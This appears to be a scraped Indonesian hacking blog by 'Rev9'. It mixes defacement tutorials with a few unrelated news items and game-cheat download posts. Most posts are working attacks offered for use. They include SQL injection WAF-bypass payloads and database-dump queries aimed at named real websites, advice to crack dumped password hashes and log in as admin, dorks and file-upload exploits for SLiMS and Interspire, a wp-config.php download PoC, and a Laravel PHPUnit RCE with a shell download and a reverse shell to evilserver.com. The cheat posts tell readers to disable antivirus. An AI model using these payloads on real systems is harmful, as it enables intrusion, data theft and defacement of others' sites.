SQL Injection Bypass WAF

SQL Injection Bypass WAF

 Halo hamker hamker sekalian

Kali ini gw (Rev) bakal share tentang macam macam bypass di sql injection. Sesuai lanjutan materi tentang SQL Injection kita lanjut ke bagian ini.

Setelah kita udah paham tentang basic sql injection, kita terkadang jumpa dengan web yang ngeselin, kayak ketika waktu mengorder by , kadang 403 forbidden, not acceptable dan lain nya. Nah kali ini gw mau bagiin cara membypass WAF di sql injection itu.

WAF atau Web Application Firewall berguna sebagai firewall security web untuk keamanan umum. Jadi, bisa dibilang web yang rata rata udah dipasangin waf itu udah kebal yang namanya dengan sql injection basic atau dengan statement error karakter (') atau (/**).

Oke deh ini dia sedikit macam macam bypass dalam sql injection, kenapa sedikit ?Karena yang banyak kalian bisa lihat di https://pastebin.com/raw/YjxeFagh


{ ORDER BY }

 

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/


[~] UNION select [~]


/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/
/*!50000union*/+/*!50000select*/


Masih banyak sebenernya cuma nanti aja buat post selanjutnya, kalo ini emang bener bener udah bisa baru w post selanjutnya.

Segitu dulu nanti minggu depan w kasi semuanya sama dios diosnya

Sekarang kita bakal coba pada suatu web yang terdapat WAF nya, web nya ialah :
https://intourhotels.com.sa/en/dining.php?id=1

Cara awal inject sama aja kyk yang basic ORDER BY, jadi w gk perlu jelasin lagi tentangORDER BY nya, karena WAF nya gk ada disitu, adanya di UNION jadi langsung ke UNION aja.


https://intourhotels.com.sa/en/dining.php?id=1+order+by+10--+ > Error
https://intourhotels.com.sa/en/dining.php?id=1+order+by+9--+ > Normal
Tau kan harus ambil yg mana

langsung ke Union



Nah pas +union+all+select+1,2,3,4,5,6,7,8,9--+ tampilannya begitu, ini lah salah satu tampilan WAF, kita coba bypass dengan query yg diatas kita ambil salah satu yang /*!50000union*/+/*!50000select*/

jangan lupa taro - sebelum parameter jadi
https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9--+
maka tampilannya kembali normal



 

yess disini kita sudah berhasil membypassnya, lanjut ...
Muncul nomor togel 3 yaudah taro dios disitu, karena ini WAF jadi Diosnya juga WAF, pake DIOS yang kemarin di Basic SQL Injection pasti gk bakal bisa,
Ni w kasi DIOS w :

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

maka BOOM

Ni w kasi Full Query nya takut gk pada paham, pahamin sendiri, atau nanya silahkan...
Nanya aja di Grup ok

https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9--+


mau Dump Database ?
Sama aja kyk biasanya Concat(table_name) . . . +from+colomn_name--+
Berhubung ini WAF maka Concatnya di Bypass juga jadi /*!50000Concat*/(table_name) . . . +from+colomn_name--+

masi gk bisa ? lu berarti ada yg salah w juga bisa
kalo masi lupa liat basic SQL Injection yang pertama w Post

Segitu aja dari w kalo da kesalahan mohon maaf dan tolong dikoreksi, Silahkan diskusi di kolom komentar/di grup.
Thanks

Basic SQL Injection

Basic SQL Injection

 

Assalamualaikum wr wb

Kali ini Materi pertama tentang SQL Injection, kita mulai dengan basicnya terlebih dahulu yaitu SQL yang tidak ada bypass bypassan, jadi ini bisa dibilang easy, yaudah langsung ajalah ...

Topik Pembahasan :

1. Bagaimana cara menemukan celah SQLI

2. Bagaimana cara Menginjeksi SQL

3. Dump Database


Pengertian SQL Injection

Serangan SQL injection atau Injeksi SQLmerupakan teknik serangan injeksi kode yang memanfaatkan celah keamanan yang terjadi pada layer basis data dari sebuah aplikasi.Hal ini terjadi sebagai akibat dari data yang diinputkan oleh pengguna tidak dilakukan validasi dan dimuat di dalam baris perintah query SQL

Yaudah segitu aja pengertiannya cukup langsung ke inti permasalahan

- Bagaimana cara menemukan celah SQLI

cara menemukannya ada bnyk cara, contoh yang paling gampang ialah menggunakan dork apa itu dork ?nanti bakal dibahas di post selanjutnya contoh dork yang umum untuk menemukan celah SQL

inurl:php?id= 

Pada situs web biasa nya ada file php?id=123 kebanyakan bug SQL ini terdapat disitu. cobalah copy dan paster dork tersebut di google maka akan muncul banyak situs web yang menampilkan file atau parameter seperti itu

paramater itu ?id=123

2. Bagaimana cara Menginjeksi SQL

Cara yang paling umum untuk mengetahui apakah website itu vuln SQL atau tidak adalah dengan cara memberikan tanda ' kutip di akhir parameter

Kita ambil contoh dengan menggunakan situs http://www.coda-continuum.com/product/product.php?id=4

taro tanda kutip di akhir parameter menjadi : coda-continuum.com/product/product.php?id=4'

Tanda ' (petik) atau %27 itu sama aja

maka akan menghasilkan tampilan atau tulisan

Database error Invalid SQL SELECT FROM products WHERE id 4 ORDER BY id ASC
MySQL error 1064 You have an error in your SQL syntax  check the manual that corresponds to your MySQL server version for the right syntax to use near  ORDER BY id ASC at line 1

Jika muncul tulisan error seperti ini
maka dipastikan web tersebut Vuln SQL Lanjut ..

Sekarang tahap mencari kolom yaitu dengan query

'+order+by+1--+

harusnya ketika disisipkan order by 1 tampilan website harus kembali seperti semula
apabila masih error tatau masih terdapat tulisan MySQL error coba buang tanda petiknya
jadi querynya begini

+order+by+1--+

Karena tiap tiap website berbeda, jadi ada yang tanda petiknya harus dipake dan ada juga yang tidak.

Selanjutnya masi sama kita masih mencari kolom dengan order by  tapi kita harus mencari angka dimana tampilan halaman website ini menjadi error kembali misal

+order+by+14--+  error

+order+by+13--+ normal

berikut tampilannya

Gambar diatas +order+by+14--+ error 

Gambar diatas +order+by+13--+ normal 

Nah maka di angka 14 error berarti kita ambil angka sebelum error yaitu angka 13

Lanjut

Sekarang tahap UNION dimana ORDER BY diganti, querynya seperti ini

+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Loh kok kenapa sampe 13 ?  karena tadi pada tahap order by itu angka sebelum error ialah angka 13

nah maka unionnya berurutan dari 1 sampai 13

Setelah itu tambahkan tanda - strip disebelum parameter

maka Query lengkapnya seperti ini

coda-continuum.com/product/product.php?id=-4+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Nah setelah itu maka akan muncul angka pada halaman website tersebut

biasanya kita menyebutnya TOGEL berikut tampilannya

Lanjut

Angka togel yang muncul ialah angka 2 5 4

Kita ambil salah satu saja yaitu angka 2

Seletah itu gantikan angka 2 itu dengan dios yang ada dibawah ini

Jadi querynya  +union+all+select+1,(DIOS TARO SINI),3,4,5,6,7,8,9,10,11,12,13--+

Jangan ketik dios tapi diganti sama dios yang ini :

(select(@x)from(select(@x:='Injected By Rev9'),(select(0)from(information_schema.columns)where(table_schema=database())and('-')in(@x:=concat+(@x,'<br>',table_name,'_',column_name))))x)

Tampilannya berbeda karena DIOSnya beda, mau DIOS kyk w ? nanti kita bahas di materi selanjutnya

Tampilan setelah dimasukkan dios maka akan seperti

Nah setelah ini kalian cari tuh table table dan kolom yang menunjukan seperti admin username password setelah itu kalian dupm

Karena di web ini gak ada table username password kita ambil contoh yang kolom

award_c:ID

award_c:Name

award_c:Banner

Maka Querynya adalah  Concat(nama_table)

Dan setelah angka 13 +from+nama_kolom

Masih belum ngerti ?

Ni w kasih aja query lengkapnya biar lu pahamin sendiri ok

http://www.coda-continuum.com/product/product.php?id=-4+union+all+select+1,Concat(ID,0x3a,Name,0x3a,banner),3,4,5,6,7,8,9,10,11,12,13+from+award_c--+

0x3a itu adalah code hex yang hasilnya ialah titik dua

Jadi w pake titik dua buat misahin antara si ID Nama dan Banner nya biar keliatan gk berantakan aja

Berikut tampilan hasil dupm database di table itu

Hasil nya itu yang tulisan warna putih

1:Six:Moons:bluemoonaward.gif

Nah Kalo misal yang lu dump itu username dan password

biasanya passwordnya itu masi dalam ecrypt MD5 dll

Contoh Md5  83f8d50075542714f88814947278440c

lu decrypt dulu password MD5 itu diwebsite penyedia MD5 w biasa di

www.md5decrypt.net

www.hashes.com

Setelah lu udah decrypt dan dapet password yang sebenarnya

barulah lu cari halaman admin login dan masukanlah username dan password yang baru aja lu dump

Demikian dan Terima Kasih

WordPress Slider Revolution 4.1.4 Arbitrary File Download vulnerability

WordPress Slider Revolution 4.1.4 Arbitrary File Download vulnerability

 
 
 
 
######################
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################


#####################
Polisi Menangkap 2 Orang Peretas Situs PN Jakarta Pusat

Polisi Menangkap 2 Orang Peretas Situs PN Jakarta Pusat


Direktorat Siber Bareskrim Polri konpers terkait penangkapan 2 pelaku peretasan situs PN Jakpus di Mabes Polri, Senin (13/1/2020).


DIREKTORAT Siber Bareskrim Mabes Polri menangkap dua orang peretas atau hacker situs sipp.pn-jakartapusat.go.id milik Pengadilan Negeri (PN) Jakarta Pusat. Kedua pelaku berinisial CA alias CAP alias Yusa, 24, dan AY alias KONSLET, 22.
Kasubdit I Direktorat Tindak Pidana Siber Bareskrim Polri, Kombes Reinhard Hutagaol, mengatakan keduanya melalukan aksi peretasan situs PN Jakarta Pusat di Apartemen Green Pramuka, Jakarta Timur pada Kamis (19/12). Aksi tersebut, lanjut Reinhard, diinisasi oleh AY.

"Tersangka AY dengan menggunakan nickname 'KONSLET' diketahui berhasil melakukan defacing atau hacking terhadap 352 situs dalam dan luar negeri," kata Reynhard.

"Kedua tersangka CA dan AY belajar melakukan deface atau hacking secara otodidak. Pendidikan terakhir keduanya adalah lulusan SD dan SMP," ujarnya.

Tangkapan layar saat situs tersebut diretas


Dikutip dari berbagai sumber di internet"
 #KONSLET
Deface Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Deface Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability


Cara Deface Exploit Slims CMS Senayan Arbitary File Upload Vulnerability - Sebenarnya POC ini sudah lama banget dan banget cuman baru kali ini bisa di writeup karena masih banyak kesibuka lain, so langsung aja berikut tutorialnya ...

Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability


#Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter
#Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
#Vendor Homepage : slims.web.id
#Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/
#Date : 28/05/2018
#Affected Version : 5/6/7
#Tested on : Windows / Linux
#Exploit Risk : High
 
Google Dorks:
#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. 
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System. 
                           It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC 

Vuln terdapat disini :
 /admin/modules/bibliography/pop_attach.php
 Contoh: 
www.target.com/senayan/admin/modules/bibliography/pop_attach.php atau
www.target.com/admin/modules/bibliography/pop_attach.php

Lalu ...


 Lalu isi terserah kalian,
Upload file ext: txt,jpg,gif,png


Dan aksesnya ada di : /repository/Rev9.png 


Sekian TerimaKasih :)
Laravel PHPUnit Remote Code Execution

Laravel PHPUnit Remote Code Execution


Laravel PHPUnit Remote Code Execution

Hallo jumpa lagi dengan saya Rev, disini saya akan kasih tutorial deface Laravel PHPUnit RCE. Sebenarnya bug ini sudah lama tapi baru kali ini aja bisa buat tutorialnya karena udah lama gk update masalah exploit. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya...



  • Vuln: eval-stdin.php
  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Affected versions : Before 4.8.28 and 5.x before 5.6.3
  Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan:


<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?> 
 
Contoh Command
 
curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  

Jika ingin spawn shell bisa ubah ke wudget/diubah ke perintah backconnect

  • wget
<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?> 
  •  Backconnect
<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?> 
 
Lalu di evil server dilisten ke port 666
 
  
Sekian tutorial kali ini
Terima Kasih untuk :
exploit.linuxsec.org

Happy Hacking :)

#Laravel PHPUnit Remote Code Execution
#RCE
#PHPUnit
#Deface
Payload SQLI To RCE

Payload SQLI To RCE


SQLI to RCE
--
Payload
<?php
$a=”sy”;
$b=”stem”;
$c=$a.$b;
$c(“uname -a”);
?>
--
PoC
https://target.com/index.php?id=' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -
 
> Shared from Niko Tidar Lantang Perkasa


#Payload SQLI To RCE

#SQLI To RCE
#Remote Code Executions (RCE)
Deface Interspire email marketer 6.2 - Remote Code Execution

Deface Interspire email marketer 6.2 - Remote Code Execution



Deface Interspire Email Marketer 6.2 - Remote Code Execution

Hallo pada kesempatan kali ini saya Rev9 akan memberitahukan bagai mana cara mendeface website dengan POC ini yaitu Interspire Email Marketer 6.2 - Remote Code Execution. Apabila masih ada yang belum paham tentang exploitnya, silahkan dapat chat saya dengan klik disini.

  Langsung saja berikut ada exploitnya

# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
# Date: May 2019
# Exploit Author: Numan Tรผrle
# Vendor Homepage: https://www.interspire.com
# Software Link: https://www.interspire.com/emailmarketer
# Version: 6.20<
# Tested on: windows
# CVE : CVE-2018-19550
# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813


surveys_submit.php
if (isset($_FILES['widget']['name'])) {
$files = $_FILES['widget']['name'];

foreach ($files as $widgetId => $widget) {
foreach ($widget as $widgetKey => $fields) {
foreach ($fields as $fieldId => $field) {
// gather file information
$name = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
$type = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
$tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
$error = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
$size = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];

// if the upload was successful to the temporary folder, move it
if ($error == UPLOAD_ERR_OK) {
$tempdir = TEMP_DIRECTORY;
$upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
$upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
$upDir = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();

// if the base upload directory doesn't exist create it
if (!is_dir($upBaseDir)) {
mkdir($upBaseDir, 0755);
}

if (!is_dir($upSurveyDir)) {
mkdir($upSurveyDir, 0755);
}

// if the upload directory doesn't exist create it
if (!is_dir($upDir)) {
mkdir($upDir, 0755);
}

// upload the file
move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
}
}
}
}
}

input file name : widget[0][field][][value]
submit : surveys_submit.php?formId=1337


POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
Content-Length: 340

------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
Content-Type: application/octet-stream


------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryF2dckZgrcE306kH2-

####

POC

<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
<form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
    <input type="file" name="widget[0][field][][value]">
    <input type="submit" value="submit" name="submit">
</form>
</body>
</html>

URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}


Apabila masih ada yang belum paham tentang exploitnya, silahkan dapat chat saya dengan klik disini. 

Sekian Terima Kasih and Happy Hacking :)


Tag:

Cara Deface Interspire Email Marketer
Remote Code Execution
Exploit
Rev9
Interspire Email Marketer 6.20 - Remote Code Execution

Interspire Email Marketer 6.20 - Remote Code Execution

Interspire Email Marketer 6.20 - Remote Code Execution

# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
# Date: May 2019
# Exploit Author: Numan Tรผrle
# Vendor Homepage: https://www.interspire.com
# Software Link: https://www.interspire.com/emailmarketer
# Version: 6.20<
# Tested on: windows
# CVE : CVE-2018-19550
# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813


surveys_submit.php
if (isset($_FILES['widget']['name'])) {
             $files = $_FILES['widget']['name'];

             foreach ($files as $widgetId => $widget) {
                 foreach ($widget as $widgetKey => $fields) {
                     foreach ($fields as $fieldId => $field) {
                         // gather file information
                         $name    = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
                         $type    = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
                         $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
                         $error   = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
                         $size    = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];

                         // if the upload was successful to the temporary folder, move it
                         if ($error == UPLOAD_ERR_OK) {
                             $tempdir   = TEMP_DIRECTORY;
                             $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
                             $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
                             $upDir     = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();

                             // if the base upload directory doesn't exist create it
                             if (!is_dir($upBaseDir)) {
                                 mkdir($upBaseDir, 0755);
                             }

                             if (!is_dir($upSurveyDir)) {
                                 mkdir($upSurveyDir, 0755);
                             }

                             // if the upload directory doesn't exist create it
                             if (!is_dir($upDir)) {
                                 mkdir($upDir, 0755);
                             }

                             // upload the file
                             move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
                         }
                     }
                 }
             }
         }

input file name : widget[0][field][][value]
submit : surveys_submit.php?formId=1337


POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
Content-Length: 340

------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
------WebKitFormBoundaryF2dckZgrcE306kH2
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryF2dckZgrcE306kH2-

####

POC

<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
<form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
    <input type="file" name="widget[0][field][][value]">
    <input type="submit" value="submit" name="submit">
</form>
</body>
</html>

URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}
           
Tutorial Deface Temp File Hosting

Tutorial Deface Temp File Hosting



How To Deface Temp File Hosting ?

H
olla teman-teman semuanya...
Salam sejahtera bagi kita semua, pada kesempatan kali ini saya akan membagikan cara mendeface website dengan metode/POC : Temp File Hosting.
Langsung saja kita mulai ...

Lets Go!!!

Bahan-Bahan :

- Dork : inurl:temp file hosting
Demo : https://temp.furhost.pw
- Script/shell
- Udah itu aja :V

Baik kita mulai langkah langkahnya



1. Dorking google dengan dork diatas kemudian pilih site yang akan di eksekusi




2. Kemudian Upload Shell/Script deface kalian
Ext : phtml/php7/asp (kalau php/html tidak bisa)





3. Kemudian Upload




4. TARAA dan berhasil di upload, tinggal di akses deh shell nya


Defaced by me : htmhttps://t.furhost.pw/IX.htm

Demikian tutorial kali ini, bagi yang ingin request deface metode apapun bisa kirim pesan melalui email atau komentar saja di bawah ini... TerimaKasih :)

TAG:

Tutorial Deface Temp File Hosting
Tutorial Deface poc Temp File Hosting
Cara Deface Temp File Hosting

Cara Deface poc Temp File HostingDeface Temp File Hosting
#Tutorial Deface Temp File Hosting
74 Grup Penjahat Siber di Facebook

74 Grup Penjahat Siber di Facebook


Revsecurity - Facebook siapa yang tak kenal dengan nama itu, facebook adalah sebuah layanan jejaring sosial/alat komunikasi yang dapat saling berbagi informasi. Facebook banyak digunakan oleh warganet untuk bertukar informasi dan membangun jejaring. Namun barangkali jarang yang menyadari ada 'tetangga siber' yang juga memanfaatkan grup facebook untuk melakukan kejahatan kriminal.


Perusahaan keamanan siber , Cisco Talos telah menemukan 74 grup Facebook dengan lebih dari 385.000 anggota yang diantaranya melakukan jual beli ilegal.

Dilaporkan SC Magazine, 5 April 2019, Cisco Talos menyebutkan , "Secara keseluruhan , Talos telah menyusun daftar 74 grup di facebook yang anggotanya melakukan serangkaian tindakan kotor siber, termasuk penjualan dan perdagangan infomasi bank/kartu kredit curian , pencurian dan kredensial akun dari berbagai situs, dan alat dan layanan spamming email. " tulis tim Talos Jon Munshaw dan Jaeson Schultz.

Tim Talos juga menyebutkan beberapa nama grup tersebut diantaranya Spam Professional; Spammer & Haccker Professional. Diantaranya memuat semacam jual beli CVV ( Kode keamanan kartu kredit/debit ) di toko ini pembayaran dengan BTC (Bitcoin) dan facebook hack (phising). Dilansir dari laman situs VIVA

#74 Grup Penjahat Siber di Facebook #Grup Penjahat Siber di Facebook #Facebook
#Penjahat siber #Cisco Talos #grup facebook
UPDATE POINT BLANK ZEPETTO 30 APRIL 2019

UPDATE POINT BLANK ZEPETTO 30 APRIL 2019

Point Blank Zepetto Cit VIP Update 21 April 2019 FREE!!!

Fitur Cit :


  • Crosshairs 
  • ESP Box
  • ESP Health
  • ESP Name 
  • ESP Line 
  • Fast Quick Change
  • Fast Reload
  • Fast Respawm
  • Fast Move Speed
  • Aimbot
  • No Recoil
  • ESP Bone / Wallhack
  • AWP Lurus (Accuracy)
  • AimBullet Killer *hot
  • Auto Killer *hot
  • Auto Macro AWP/SG
  • Jump
  • ddk
 Setting Menu Hotkey:
  • Arah Panah Atas dan Bawah = Pilih menu cheat
  • Arah Panah Kanan = ON kan Cheat 
  • Arah Panah Kiri  = OFF kan Cheat
  • INSERT = Tampilkan / Sembunyikan Menu

Tutorial Menggunakan Cheat

  • Download cheat seperti biasa.
  • Extact File cit dengan winrar / 7 zip
  • Open File (ber exentensi EXE) (utk Win7,win8,win10 klik kanan Run as Administrator)
  • Klik Generate Key!,Lewati SkipAd, Copy Key nya lalu masukan ke injector, klik ok.
  • Start Launcher PointBlank
  • Happy Cheatting !!

 




Jika Terjadi eror pada saat download CIT harap matikan anti virus terlebih dahulu
Tag:
Point Blank Cit VIP
Cit point blank
Cit Point Blank VIP gratis
Cara CIt Point Blank VIP Gratis
Download Cit Point Blank VIP


Apex Legends Cit V9

Apex Legends Cit V9


Apex Legends Cit V9
Link Download :

DOWNLOAD CIT


Fitus Cheat :
  • AIM BOT
  • WALLHACKS
  • ESP HEALTH
  • ESP RADAR
  • ESP WEAPON
  • ESP DISTANCE
  • NO RECOIL
  • FULL HACKS
 Tutorial :
  • MATIKAN SEMUA ANTI VIRUS
  • MATIKAN WINDOWS DEFENDER
  • INSTALL VC REDIST 2008,2010,2013,2015,2017
  • INSTALL NET FRAME NEW
  • INTALL DIRECT 11

1. OPEN LAUNCHER ORIGIN EA

2. OPEN CIT LALU KLIK OK
3. TUNGGU 5-15 DETIK

4. SELECT GAME APEX LEGENDS


5. PLAY GAME APEX LEGENDS

Dan baca juga tutorial pada file download !!!

LINK DOWNLOAD CIT APEX LEGENDS :

Tag :
 Apex Legends Cit V9
Apex Legends Cit
Cit Apex Legends
Cara Cit Apex Legends
Apex Legends
Cit

Kominfo Blokir Situs Jurdil2019.org

Kominfo Blokir Situs Jurdil2019.org


Kominfo sejak semalam memblokir laman jurdil2019.org atas permintaan dari Badan Pengawas Pemilihan Umum (Bawaslu).

Kepala Biro Humas Kementerian Komunikasi dan Informatika Ferdinandus Setu mengonfirmasi kabar tersebut.

"Alasannya karena menyalahgunakan izin yang diberikan," kata pria yang akrab disapa Nando saat dihubungi Antara, Minggu.
Izin yang diberikan Bawaslu adalah sebagai pemantau pemilu, namun Jurdil 2019 justru melaporkan perhitungan Quick Count dan Real Count yang dianggap menyalahi aturan.


"Itu (lembaga yang melaporkan perhitungan) hanya diberikan ke 40 lembaga oleh KPU," ujar Nando.

Lembaga lain di luar dari 40 lembaga yang sudah terdaftar dilarang melakukan survei atau hitung cepat yang dipublikasikan ke publik, karena menurut undang-undang, lembaga survei harus mendaftar ke KPU.

"Jika ada selain 40 lembaga survei itu merilis hasilnya itu pelanggaran," kata Komisioner KPU RI Wahyu Setiawan di Jakarta,

Pihak Jurdil 2019 menyatakan pemblokiran berlangsung sepihak, dan mengatakan pihaknya tidak merasa melanggar aturan.

"Menurut versi kita, kita cuma himpun dan catat C1 dari seluruh indonesia yang dikumpulkan lewat aplikasi yang di-install masyarakat, ini bentuk partisipasi masyarakat dalam memantau pemilu," kata Danu, help desk Jurdil 2019 yang dihubungi Antara dari nomor telepon yang tercantum di akun media sosial lembaga itu.

Ia mengatakan pihaknya hanya mengawal proses penghitungan suara.

"Tidak ada maksud tendensi apa-apa, yang jadi permasalahan dianggap melanggar sebenarnya tidak ada, masalah real count atau quick count itu terjemahan masyarakat," ia beralasan.

Jurdil 2019 digagas oleh Aktivis Alumni Institut Teknologi Bandung (ITB) 1973. Anggota Jurdil 2019 Rulianti menyatakan lembaganya tercatat di Badan Pengawas Pemilihan Umum (Bawaslu) sebagai pemantau Pemilu 2019 dengan nomor sertifikasi Akreditasi: 063/BAWASLU/IV/2019. Ia mengaku mendapatkan akreditasi dari Bawaslu pada 1 April 2019.

Hanya saja, kata Rulianti, lembaganya terdaftar atas nama PT Prawedanet Aliansi Teknologi. Ia mengatakan inisiatif membuat Jurdil 2019 muncul di waktu yang cukup dekat dengan Pemilu 2019. Walhasil, mereka tidak sempat untuk membuat badan hukum resmi dengan nama Jurdil 2019 dan memakai 'bendera' bernama PT Prawedanet Aliansi Teknologi.

"Kita mungkin sebulan sebelumnya ya udah apply [ke Bawaslu sebagai pemantau Pemilu]. Biasanya LSM yang apply kita kan PT ya, tapi kita punya PT yang bergerak di bidang IT jadi ya akhirnya kita dapat. Karena harus badan hukum terdaftar.

Prabowo-Sandiaga tercatat unggul 58,1 persen suara, sementara Jokowi-Ma'ruf hanya 39,5 persen. Kemudian untuk suara tidak sah jumlahnya mencapai 2,4 persen. Hal itu berdasarkan perhitungan Jurdil 2019 dari 1.575 TPS di 34 provinsi per 18 April 2019 pukul 15.20 WIB.

Berikut ini 40 lembaga survei yang sudah terdaftar di KPU sebagai penyelenggara jajak pendapat dan hitung cepat pemilu 2019.

1. Lembaga Survei Kelompok Diskusi dan Kajian Opini Publik Indonesia (KedaiKOPI)
2. Poltracking Indonesia
3. Indonesia Research And Survey (IRES)
